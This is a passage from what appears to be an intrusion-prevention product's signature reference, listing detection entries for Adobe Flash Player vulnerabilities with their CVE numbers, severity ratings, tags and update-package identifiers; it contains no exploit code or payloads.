Tags: Windows, OS X, Linux, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, OS X not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Adobe-Flash-Bitmapdata-copyPixels-UAF
Description:
Back to top

File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0633

About this situation: A vulnerability in Adobe Flash Player
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0633
Description:
Back to top

File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0634

About this situation: A vulnerability in Adobe Flash Player
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0634
Description:
Back to top

File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0638

About this situation: A vulnerability in Adobe Flash Player
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-510-5211
Last changed: sgpkg-ips-1396-5242
Vulnerability: Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0634
Description:
Back to top

File-Flash_Adobe-Flash-copyPixels-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Vulnerability: File-Flash_Adobe-Flash-copyPixels-Integer-Overflow
Description:
Back to top

File-Flash_Adobe-Flash-Corrupted-SWF-File

About this situation: An attempt to exploit an Adobe Flash Corrupted-SWF File vulnerability detected.
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: Adobe-Flash-Corrupted-SWF-File
Description:
Back to top

File-Flash_Adobe-Flash-CVE-2013-0634

About this situation: A suspicious Flash file detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Flash_Adobe-Flash-CVE-2013-5331

About this situation: A suspicious Flash file detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Flash_Adobe-Flash-Exploit-CVE-2010-3643

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Flash-CVE-2010-3654-Remote-Code-Execution-Vulnerability
Description:
Back to top

File-Flash_Adobe-Flash-Exploit-CVE-2011-0609

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: Flash File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0609
Description:
Back to top

File-Flash_Adobe-Flash-Exploit-CVE-2011-0609-2

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0609
Description:
Back to top

File-Flash_Adobe-Flash-Exploit-CVE-2011-0611

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: Flash File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-658-5211
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0611
Description:
Back to top

File-Flash_Adobe-Flash-Iexternalizable-Interface-Readexternal-Method-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-716-5211
Last changed: sgpkg-ips-716-5211
Vulnerability: Adobe-Flash-Iexternalizable-Interface-Readexternal-Method-Type-Confusion
Description:
Back to top

File-Flash_Adobe-Flash-Iexternalizable-Interface-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-700-5211
Vulnerability: Adobe-Flash-Iexternalizable-Interface-Type-Confusion
Description:
Back to top

File-Flash_Adobe-Flash-Json.stringify-Proxy-Object-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-639-5211
Vulnerability: Adobe-Flash-Json.stringify-Proxy-Object-Heap-Buffer-Overflow
Description:
Back to top

File-Flash_Adobe-Flash-Loadpcmfrombytearray-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Adobe Flash Player Desktop Runtime detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-1329-5242
Vulnerability: Adobe-Flash-Loadpcmfrombytearray-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Media-Transfer

About this situation: Detected a download of Adobe Flash content
Context: Flash File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Streaming Protocols, Media File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Adobe-Flash-Media-Content
File-Type-Identification
Description:
Back to top

File-Flash_Adobe-Flash-Memory-Corruption-CVE-2012-5267

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-493-5211
Vulnerability: Adobe-Flash-Memory-Corruption-CVE-2012-5267
Description:
Back to top

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4132

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4132
Description:
Back to top

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4133

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4133
Description:
Back to top

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4150

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4150
Description:
Back to top

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4151

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4151
Description:
Back to top

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4152

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4152
Description:
Back to top

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4153

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4153
Description:
Back to top

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4154

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4154
Description:
Back to top

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4155

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4155
Description:
Back to top

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4156

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4156
Description:
Back to top

File-Flash_Adobe-Flash-Multiple-File-Loading-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Heap-Overflow-Vulnerability-CVE-2016-4135
Adobe-Flash-Heap-Overflow-Vulnerability-CVE-2016-4136
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4137
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4138
Description:
Back to top

File-Flash_Adobe-Flash-parseFloat-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Adobe-Flash-parseFloat-Stack-Buffer-Overflow
Description:
Back to top

File-Flash_Adobe-Flash-PCRE-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-639-5211
Vulnerability: Adobe-Flash-PCRE-Memory-Corruption
Description:
Back to top

File-Flash_Adobe-Flash-Player-And-Air-Domain-Global-Memory-Operation-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, Adobe Systems AIR SDK, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-741-5211
Vulnerability: Adobe-Flash-Player-And-Air-Domain-Global-Memory-Operation-Integer-Underflow
Description:
Back to top

File-Flash_Adobe-Flash-Player-And-Air-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, Adobe Systems AIR SDK, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1106-5242
Last changed: sgpkg-ips-1106-5242
Vulnerability: Adobe-Flash-Player-And-Air-Multiple-Vulnerabilities
Description:
Back to top

File-Flash_Adobe-Flash-Player-And-Air-String-Concatenation-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Adobe-Flash-Player-And-Air-String-Concatenation-Integer-Overflow
Description:
Back to top

File-Flash_Adobe-Flash-Player-Asnative-2100-Netconnection-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: Adobe-Flash-Player-Asnative-2100-Netconnection-Type-Confusion
Description:
Back to top

File-Flash_Adobe-Flash-Player-Audio-Buffer-Overflow-CVE-2015-3113

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player was detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1321-5242
Vulnerability: Adobe-Flash-Player-Audio-Buffer-Overflow-CVE-2015-3113
Description:
Back to top

File-Flash_Adobe-Flash-Player-Bitmapdata-Hittest-Out-of-Bounds-Access

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1045-5242
Vulnerability: Adobe-Flash-Player-Bitmapdata-Hittest-Out-of-Bounds-Access
Description:
Back to top

File-Flash_Adobe-Flash-Player-ByteArray-Uncompression-Uninitialized-Reference

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, Adobe Systems AIR SDK, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Adobe-Flash-Player-ByteArray-Uncompression-Uninitialized-Reference
Description:
Back to top

File-Flash_Adobe-Flash-Player-ByteArray-Use-After-Free-RCS

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-700-5211
Vulnerability: Adobe-Flash-Player-ByteArray-Use-After-Free-RCS
Description:
Back to top

File-Flash_Adobe-Flash-Player-Convolutionfilter-Matrix-Array-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR desktop runtime detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-671-5211
Vulnerability: Adobe-Flash-Player-Convolutionfilter-Matrix-Array-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-Copypixelstobytearray-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Adobe-Flash-Player-Copypixelstobytearray-Integer-Overflow
Description:
Back to top

File-Flash_Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing
Description:
Back to top

File-Flash_Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing-2

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing
Description:
Back to top

File-Flash_Adobe-Flash-Player-CVE-2014-8439-Write-What-Where

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Adobe-Flash-Player-CVE-2014-8439-Write-What-Where
Description:
Back to top

File-Flash_Adobe-Flash-Player-CVE-2015-3106-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-683-5211
Vulnerability: Adobe-Flash-Player-CVE-2015-3106-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-CVE-2015-5561-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-683-5211
Vulnerability: Adobe-Flash-Player-CVE-2015-5561-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-CVE-2018-15982-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1122-5242
Vulnerability: Adobe-Flash-Player-CVE-2018-15982-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-CVE-2018-4878-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player Desktop Runtime detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Vulnerability: Adobe-Flash-Player-CVE-2018-4878-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-Domainmemory-Clear-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-683-5211
Vulnerability: Adobe-Flash-Player-Domainmemory-Clear-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-Domainmemory-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Adobe-Flash-Player-Domainmemory-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-Domainmemory-Write-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-656-5211
Vulnerability: Adobe-Flash-Player-Domainmemory-Write-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-Filereference-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR desktop runtime detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: Adobe-Flash-Player-Filereference-Type-Confusion
Description:
Back to top

File-Flash_Adobe-Flash-Player-FLV-Processing-Buffer-Overflow

About this situation: Detected attempt to exploit buffer overflow vulnerability in Adobe Flash Player
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1405-5242
Vulnerability: Adobe-Flash-Player-FLV-Processing-Buffer-Overflow
Description:
Back to top

File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player (for Linux) detected
Context: Flash File Stream
Severity: 7
Tags: Linux, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2008, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
Description:
Back to top

File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution-2

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player (for Linux) detected
Context: Flash File Stream
Severity: 7
Tags: Linux, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2008, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
Description:
Back to top

File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution-3

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player (for Linux) detected
Context: Flash File Stream
Severity: 7
Tags: Linux, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2008, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
Description:
Back to top

File-Flash_Adobe-Flash-Player-Function-Variables-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player Detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Flash-Player-Function-Variables-Information-Disclosure
Description:
Back to top

File-Flash_Adobe-Flash-Player-Index-Overflow-Vulnerability

About this situation: A vulnerability in Adobe Flash Player
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-497-5211
Last changed: sgpkg-ips-497-5211
Vulnerability: Adobe-Flash-Player-Index-Overflow-Vulnerability
Description:
Back to top

File-Flash_Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-493-5211
Vulnerability: Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow
Description:
Back to top

File-Flash_Adobe-Flash-Player-Load-And-Store-Write-What-Where

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Adobe-Flash-Player-Load-And-Store-Write-What-Where
Description:
Back to top

File-Flash_Adobe-Flash-Player-Loadpcmfrombytearray-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: Adobe-Flash-Player-Loadpcmfrombytearray-Integer-Overflow
Description:
Back to top

File-Flash_Adobe-Flash-Player-Localeid-Determinepreferredlocales-Out-of-Bounds-Access

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1032-5242
Vulnerability: Adobe-Flash-Player-Localeid-Determinepreferredlocales-Out-of-Bounds-Access
Description:
Back to top

File-Flash_Adobe-Flash-Player-Nellymoser-Datasize-Heap-Buffer-Overflow

